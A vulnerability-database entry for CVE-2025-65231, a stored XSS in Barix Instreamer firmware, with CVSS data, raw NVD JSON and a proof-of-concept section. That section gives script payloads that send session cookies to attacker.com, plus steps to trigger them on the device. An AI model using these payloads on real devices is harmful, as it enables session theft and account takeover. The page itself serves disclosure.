Security Vulnerability Report
中文
CVE-2025-65231 CVSS 6.1 MEDIUM

CVE-2025-65231

Published: 2025-12-08 19:15:50
Last Modified: 2025-12-17 15:26:47

Description

Barix Instreamer v04.06 and earlier is vulnerable to Cross Site Scripting (XSS) in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field which is stored and later rendered on the Status page.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:barix:instreamer_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:barix:instreamer:-:*:*:*:*:*:*:* - NOT VULNERABLE
Barix Instreamer v04.06及更早版本
Barix Instreamer firmware <= v04.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-65231 Stored XSS PoC for Barix Instreamer --> <!-- Inject this payload in the CTS close command field in I/O & Serial configuration page --> <!-- Basic XSS Alert --> <script>alert('XSS Vulnerability - CVE-2025-65231')</script> <!-- Cookie Stealing Payload --> <script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))</script> <!-- Session Hijacking Payload --> <script>var xhr=new XMLHttpRequest();xhr.open('POST','https://attacker.com/log',true);xhr.send(document.cookie);</script> <!-- Steps to reproduce: 1. Access Barix Instreamer Web UI (default: http://192.168.0.100) 2. Navigate to: Settings > I/O & Serial 3. Find the 'CTS close command' input field 4. Paste one of the payloads above 5. Save configuration 6. Navigate to Status page 7. XSS will be triggered -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65231", "sourceIdentifier": "[email protected]", "published": "2025-12-08T19:15:50.420", "lastModified": "2025-12-17T15:26:46.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Barix Instreamer v04.06 and earlier is vulnerable to Cross Site Scripting (XSS) in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field which is stored and later rendered on the Status page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:barix:instreamer_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.06", "matchCriteriaId": "9DDC56AA-3613-49C8-8B22-361A9C061351"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:barix:instreamer:-:*:*:*:*:*:*:*", "matchCriteriaId": "CAA09088-FB0F-4BF3-88E7-3A9D8E0BA26B"}]}]}], "references": [{"url": "https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65231", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://help.barix.com/instreamer/user-manual", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65231", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}